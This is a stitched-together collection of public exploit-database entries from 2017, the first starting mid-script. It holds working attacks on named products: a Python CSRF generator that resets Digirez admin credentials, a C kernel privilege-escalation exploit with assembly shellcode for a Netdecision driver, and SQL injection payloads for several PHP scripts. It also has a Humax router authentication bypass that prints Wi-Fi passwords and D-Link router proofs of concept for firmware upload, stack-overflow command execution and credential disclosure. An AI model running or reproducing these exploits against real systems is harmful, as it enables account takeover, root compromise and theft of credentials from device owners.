<form method="POST" action="%s/user_save.asp" name="user">
<table border="0" align="center">
<tbody><tr>
<td valign="middle">
<table border="0" align="center">
<tbody><tr>
<td bgcolor="gray" align="center">
<table width="400" cellspacing="1" cellpadding="2" border="0">
<tbody><tr>
<td colspan="2" bgcolor="cream" align="left">
<font color="red">User Update</font>
</td>
</tr>
<tr>
<td>
<font><b>Choose Login*</b></font>
</td>
<td>
<input name="login" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td>
<font><b>Choose Password*</b></font>
</td>
<td>
<input name="password" size="30" value="admin" type="text">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input name="id" value="%s" type="hidden">
<input value="Update" onclick="return check()" type="submit">
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</form>
''' %(url, id)
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print("")
csrfexploit()
#!/usr/local/bin/python
# # # # #
# Exploit Title: Digirez 3.4 - Cross-Site Request Forgery (Update User & Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/index.asp
# Demo: http://www.digiappz.com/room/index.asp
# Version: 3.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def csrfexploit():
e_baslik = '''
################################################################################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
ihsan[@]ihsan.net
+
Digirez 3.4 - CSRF (Update Admin)
################################################################################
'''
print e_baslik
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/room: "))
id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8565): ")
csrfhtmlcode = '''
<html>
<body>
<form method="POST" action="%s/user_save.asp" name="user" >
<table align=center border=0>
<tr>
<td valign="middle">
<table align=center border=0>
<tr>
<td align=center bgcolor="white">
<table border=0 width=400 cellpadding=2 cellspacing=1>
<tr>
<td align=left colspan=2 bgcolor="cream">
<font color="red">User Update</font>
</td>
</tr>
<tr>
<td width=150>
<font>Choose Login*</font>
</td>
<td>
<INPUT type="text" name="login" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Choose Password*</font>
</td>
<td>
<INPUT type="text" name="password" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>First Name*</font>
</td>
<td>
<INPUT type="text" name="first_name" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Last Name*</font>
</td>
<td>
<INPUT type="text" name="last_name" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Email*</font>
</td>
<td>
<INPUT type="text" name="email" size="30"value="admin@admin.com" onBlur="emailvalid(this);">
</td>
</tr>
<tr>
<td>
<font>Address 1</font>
</td>
<td>
<INPUT type="text" name="address1" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Address 2</font>
</td>
<td>
<INPUT type="text" name="address2" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>City / Town</font>
</td>
<td>
<INPUT type="text" name="city" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>ZIP / Postcode</font>
</td>
<td>
<INPUT type="text" name="postcode" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>State / County</font>
</td>
<td>
<INPUT type="text" name="county" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Country</font>
</td>
<td>
<select name="country">
<option value="1" selected> Turkey
</select>
</td>
</tr>
<tr>
<td>
<font>Phone Number
<td>
<INPUT type="text" name="phone" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Fax</font>
</td>
<td>
<INPUT type="text" name="fax" size="30"value="admin">
</td>
</tr>
<tr>
<td>
<font>Status</font>
</td>
<td>
<select name="status">
<option value="1"> User</option>
<option value="2" selected> Admin</option>
</select>
</td>
</tr>
<tr>
<td colspan=2 align=center>
<input type="hidden" name="id" value="%s">
<input type="submit" value="Update" onclick="return check()">
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>
''' %(url, id)
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print("")
csrfexploit()
// Netdecision.cpp : Defines the entry point for the console application.
/*
# Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys
# Date: 2017.09.17
# Exploit Author: Peter Baris
# Vendor Homepage: www.netmechanica.com
# Software Link: http://www.netmechanica.com/downloads/ //registration required
# Version: 5.8.2
# Tested on: Windows 7 Pro SP1 x86 / Windows 7 Enterprise SP1
# CVE : CVE-2017-14311
Vendor notified on 2017.09.11 - no response */
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
#include <tlhelp32.h>
#include <Psapi.h>
#define DEVICE_NAME L"\\\\.\\WinRing0_1_2_0"
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
HANDLE hFile = NULL;
hFile = CreateFile(FileName,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
NULL,
0);
return hFile;
}
extern ULONG ZwYieldExecution = NULL;
extern PVOID KernelBaseAddressInKernelMode = NULL;
extern HMODULE hKernelInUserMode = NULL;
VOID GetKiFastSystemCall() {
SIZE_T ReturnLength;
HMODULE hntdll = NULL;
ULONG ZwYieldExecution_offset;
hntdll = LoadLibraryA("ntdll.dll");
if (!hntdll) {
printf("[-] Failed to Load ntdll.dll: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
LPVOID drivers[1024];
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
KernelBaseAddressInKernelMode = drivers[0];
printf("[+] Kernel base address: 0x%X\n", KernelBaseAddressInKernelMode);
hKernelInUserMode = LoadLibraryA("ntkrnlpa.exe");
if (!hKernelInUserMode) {
printf("[-] Failed to load kernel: 0x%X\n", GetLastError());
exit;
}
printf("[+] KernelImage Base in User-Mode 0x%X\r\n", hKernelInUserMode);
ZwYieldExecution = GetProcAddress(hKernelInUserMode, "ZwYieldExecution");
if (!ZwYieldExecution) {
printf("[-] Failed to resolve KiFastSystemCall: 0x%X\n", GetLastError());
exit;
}
ZwYieldExecution_offset = (ULONG)ZwYieldExecution - (ULONG)hKernelInUserMode;
printf("[+] ZwYieldExecution's offset address in ntkrnlpa.exe: 0x%X\n", ZwYieldExecution_offset);
(ULONG)ZwYieldExecution = (ULONG)ZwYieldExecution_offset + (ULONG)KernelBaseAddressInKernelMode;
printf("[+] ZwYieldExecution's address in kernel-mode: 0x%X\n", ZwYieldExecution);
if (hntdll) {
FreeLibrary(hntdll);
}
if (hKernelInUserMode) {
FreeLibrary(hKernelInUserMode);
}
hntdll = NULL;
return hKernelInUserMode;
return ZwYieldExecution;
}
extern ULONG eip = NULL;
extern ULONG pesp = NULL;
extern ULONG pebp = NULL;
extern ULONG ETHREAD = NULL;
ULONG Shellcode() {
ULONG FunctionAddress = ZwYieldExecution;
__asm {
pushad
pushfd
xor eax,eax
mov edi, FunctionAddress ; Address of ZwYieldExection to EDI
SearchCall:
mov eax, 0xe8
scasb
jnz SearchCall
mov ebx, edi
mov ecx, [edi]
add ebx, ecx; EBX points to KiSystemService
add ebx, 0x4
lea edi, [ebx - 0x1]
SearchFastCallEntry:
mov eax, 0x00000023
scasd
jnz SearchFastCallEntry
mov eax, 0xa10f306a
scasd
jnz SearchFastCallEntry
lea eax,[edi-0x9]
xor edx, edx
mov ecx, 0x176
wrmsr
popfd
popad
mov eax,ETHREAD
mov eax,[eax]
mov eax, [eax+0x050]
mov ecx, eax
mov edx, 0x4
FindSystemProcess :
mov eax, [eax + 0x0B8]
sub eax, 0x0B8
cmp[eax + 0x0B4], edx
jne FindSystemProcess
mov edx, [eax + 0x0F8]
mov[ecx + 0x0F8], edx
;xor eax, eax
mov esp,pesp
mov ebp,pebp
push eip
; int 3
ret
}
}
int main()
{
HANDLE hlib = NULL;
HANDLE hFile = NULL;
PVOID lpInBuffer = NULL;
ULONG lpOutBuffer = NULL;
ULONG lpBytesReturned;
PVOID BuffAddress = NULL;
SIZE_T BufferSize = 0x1000;
SIZE_T nOutBufferSize = 0x800;
ULONG Interval = 0;
ULONG Shell = &Shellcode;
NTSTATUS NtStatus = NULL;
/* Undocumented feature to trigger the vulnerability */
hlib = LoadLibraryA("ntdll.dll");
if (!hlib) {
printf("[-] Failed to load the library: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
GetKiFastSystemCall();
/* Allocate memory for our input and output buffers */
lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
/*Getting KiFastSystemCall address from ntdll.dll to restore it in 0x176 MSR*/
lpOutBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//printf("[+] Address to write our shellcode's address to: 0x%X\r\n", lpOutBuffer);
/* Crafting the input buffer */
BuffAddress = (PVOID)(((ULONG)lpInBuffer));
*(PULONG)BuffAddress = (ULONG)0x00000176; /*IA32_SYSENTER_EIP MSR*/
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x4));
*(PULONG)BuffAddress = (ULONG)Shell; /*Our assembly shellcode Pointer into EAX*/
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x8));
*(PULONG)BuffAddress = (ULONG)0x00000000; /* EDX is 0x00000000 in 32bit mode */
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0xc));
*(PULONG)BuffAddress = (ULONG)0x00000000;
//RtlFillMemory(lpInBuffer, BufferSize, 0x41);
//RtlFillMemory(lpOutBuffer, BufferSize, 0x42);
//printf("[+] Trying the get the handle for the WinRing0_1_2_0 device.\r\n");
hFile = GetDeviceHandle(FileName);
if (hFile == INVALID_HANDLE_VALUE) {
printf("[-] Can't get the device handle. 0x%X\r\n", GetLastError());
return 1;
}
else
{
printf("[+] Handle opened for WinRing0x32. Sending IOCTL.\r\n");
}
/*Here we calculate the EIP for our return from kernel-mode. This exploit does not let us simply adjust the stack and return*/
(HANDLE)eip = GetModuleHandleA(NULL); /*Getting the base address of our process*/
printf("[+] Current process base address 0x%X\r\n", (HANDLE)eip);
(HANDLE)eip = eip + 0x13ae; /*Any time you change something in the main() section you MUST adjust the offset to point to the PUSH 40 instrction*/
printf("[+] Return address (EIP) from kernel-mode 0x%X\r\n", (HANDLE)eip);
/*Setting CPU affinity before execution to maximize the chance of executing our code on the same CPU core*/
DWORD_PTR i = 1; /*CPU Core with ID 1 will be always chosen for the execution*/
ULONG affinity = SetThreadAffinityMask(GetCurrentThread(), i);
printf("[+] Setting affinity for logical CPU with ID:%d\r\n", i);
if (affinity == NULL) {
printf("[-] Something went wrong while setting CPU affinity 0x%X\r\n", GetLastError());
exit(1);
}
ETHREAD = (ULONG)KernelBaseAddressInKernelMode + 0x12bd24; /*Offset to nt!KiInitialThread as TEB is not readable*/
/*Saving stack pointer and stack frame of user-mode before diving in kernel-mode to restore it before returning to user-mode */
__asm {
mov pesp, esp
mov pebp, ebp
nop
}
DeviceIoControl(hFile,
0x9C402088,
lpInBuffer,
0x10,
lpOutBuffer,
0x20,
&lpBytesReturned,
NULL);
STARTUPINFO info = { sizeof(info) };
PROCESS_INFORMATION processInfo;
NTSTATUS proc;
LPCSTR command = L"C:\\Windows\\System32\\cmd.exe";
proc = CreateProcess(command, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &info, &processInfo);
if (!proc) {
printf("ERROR 0x%X\r\n", proc);
}
WaitForSingleObject(processInfo.hProcess, INFINITE);
exit(0);
}
# # # # #
# Exploit Title: PTCEvolution 5.50 - SQL Injection
# Dork: N/A
# Date: 15.09.2017
# Vendor Homepage: http://ptcevolution.com/
# Software Link: http://www.ptcevolution.com/demoo/
# Demo: http://demo.ptcevolution.com/
# Version: 5.50
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?view=product&id=[SQL]
# http://localhost/[PATH]/index.php?view=products&id=[SQL]
#
# -4++/*!03333UNION*/(/*!03333SELECT*/+(1),(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9))--+-
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Contact Manager 1.0 - SQL Injection
# Dork: N/A
# Date: 15.09.2017
# Vendor Homepage: http://savsofteproducts.com/
# Software Link: http://www.contactmanagerscript.com/download/contact_manager_1380185909.zip
# Demo: http://contactmanagerscript.com/demo/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Vulnerable Source:
#
# .............
# <a href="login.php?forgot=1">Forgot Password ?</a>
# <?php
# if(isset($_REQUEST["forgot"])){
# if($_REQUEST["forgot"]=="2"){
# $result=mysql_query("select * from co_setting where Email='$_REQUEST[femail]' ");
# $count=mysql_num_rows($result);
# if($count==1)
#
# {
#
# $npass=rand("5556","99999");
#
# $to = $row['femail'];
# $subject = "Password Reset";
# $message = "New Primary Password is: $npass \r\n";
# $headers = "From: $Email";
#
# $npass=md5($npass);
#
# $query="update co_setting set Password='$npass' where Email='$_REQUEST[femail]'";
# mysql_query($query);
# .............
#
# Proof of Concept:
#
# http://localhost/[PATH]/login.php?forgot=2&femail=[SQL]
#
# Etc..
# # # # #
# coding: utf-8
# Exploit Title: Humax HG100R-* Authentication Bypass
# Date: 14/09/2017
# Exploit Author: Kivson
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-11435
# The Humax Wi-Fi Router model HG100R-* 2.0.6 is prone to an authentication bypass vulnerability via specially
# crafted requests to the management console. The bug is exploitable remotely when the router is configured to
# expose the management console.
# The router is not validating the session token while returning answers for some methods in url '/api'.
# An attacker can use this vulnerability to retrieve sensitive information such
# as private/public IP addresses, SSID names, and passwords.
import sys
import requests
def print_help():
print('Exploit syntax error, Example:')
print('python exploit.py http://192.168.0.1')
def exploit(host):
print(f'Connecting to {host}')
path = '/api'
payload = '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}'
response = requests.post(host + path, data=payload)
response.raise_for_status()
if 'result' not in response.json() or 'WiFi_Info' not in response.json()['result'] or 'wlan' not in \
response.json()['result']['WiFi_Info']:
print('Error, target may be no exploitable')
return
for wlan in response.json()['result']['WiFi_Info']['wlan']:
print(f'Wifi data found:')
print(f' SSID: {wlan["ssid"]}')
print(f' PWD: {wlan["password"]}')
def main():
if len(sys.argv) < 2:
print_help()
return
host = sys.argv[1]
exploit(host)
if __name__ == '__main__':
main()
#!/bin/bash
# If you have access to an ethernet port you can upload custom firmware to a device because system recovery service is started and available for a few seconds after restart.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/update.sh
FIRMWARE="firmware.bin"
IP="192.168.0.1"
while true; do
T=$(($RANDOM + ($RANDOM % 2) * 32768))
STATUS=`wget -t 1 --no-cache -T 0.2 -O - http://$IP/?_=$T 2>/dev/null`
if [[ $STATUS == *"<title>Provided by D-Link</title>"* ]]; then
echo "Uploading..."
curl -F "data=@$FIRMWARE" --connect-timeout 99999 -m 99999 --output /dev/null http://$IP/f2.htm
break
elif [[ $STATUS == *"<title>D-LINK</title>"* ]]; then
echo "Rebooting..."
echo -n -e '\x00\x01\x00\x01EXEC REBOOT SYSTEMaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' | timeout 1s nc -u $IP 19541
fi
done
# Due to error in hnap protocol implementation we can overflow stack and execute any sh commands under root priviliges.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/hnap.py
import requests as rq
import struct
IP = "192.168.0.1"
PORT = "80"
# Can differ in different version of routers and versions of firmware
# SYSTEM_ADDRESS = 0x1B570 # DIR-890L_REVA_FIRMWARE_PATCH_v1.11B02.BETA01
SYSTEM_ADDRESS = 0x1B50C # DIR-890L_REVA_FIRMWARE_1.10.B07
def _str(address):
return struct.pack("<I", address) if address > 0 else struct.pack("<i", address)
url = 'http://{ip}:{port}/HNAP1/'.format(ip=IP, port=PORT)
headers_text = {
'SOAPACTION' : 'http://purenetworks.com/HNAP1/Login',
'CONTENT-TYPE' : 'text/html'
}
payload = b"echo 1 > /tmp/hacked;"
print(rq.post(url, data=b"<Action>" + payload + b"A" * (0x400 - len(payload)) + _str(-1) + b"C" * 0x14 + _str(SYSTEM_ADDRESS)[0:3] + b"</Action>", headers=headers_text).text)
# phpcgi is responsible for processing requests to .php, .asp and .txt pages. Also, it checks whether a user is authorized or not. Nevertheless, if a request is crafted in a proper way, an attacker can easily bypass authorization and execute a script that returns a login and password to a router.
# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin
# E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/phpcgi.py
import requests as rq
EQ = "%3d"
IP = "192.168.0.1"
PORT = "80"
def pair(key, value):
return "%0a_POST_" + key + EQ + value
headers_multipart = {
'CONTENT-TYPE' : 'application/x-www-form-urlencoded'
}
url = 'http://{ip}:{port}/getcfg.php'.format(ip=IP, port=PORT)
auth = "%0aAUTHORIZED_GROUP%3d1"
data = "A=A" + pair("SERVICES", "DEVICE.ACCOUNT") + auth
print(rq.get(url, data=data, headers=headers_multipart).text)
# Exploit Title: Consumer Review Script v1.0 - SQL Injection
# Date: 2017-09-12
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/product/consumer-review-script/
# Software Link: http://www.phpscriptsmall.com/product/consumer-review-script/
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-12
Product & Service Introduction:
===============================
Consumer Review Script
Technical Details & Description:
================================
SQL injection on [idvalue] URI parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/review-details.php?idvalue=9 and sleep(5)
Parameter: idvalue (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: idvalue=90 AND (SELECT 5020 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(5020=5020,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: idvalue=90 AND SLEEP(5)
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: XYZ Auto Classifieds v1.0 - SQL Injection
# Date: 2017-09-12
# Exploit Author: 8bitsec
# Vendor Homepage: http://xyzscripts.com/
# Software Link: https://xyzscripts.com/php-scripts/xyz-auto-classifieds/details
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-12
Product & Service Introduction:
===============================
XYZ Auto Classifieds is a simple and robust PHP + MySQL based auto classifieds script with all options required to start your own auto classifieds site like cars.com.
Technical Details & Description:
================================
SQL injection on [view] URI parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/xyz-auto-classifieds/item/view/13 and sleep(5)
==================
8bitsec - [https://twitter.com/_8bitsec]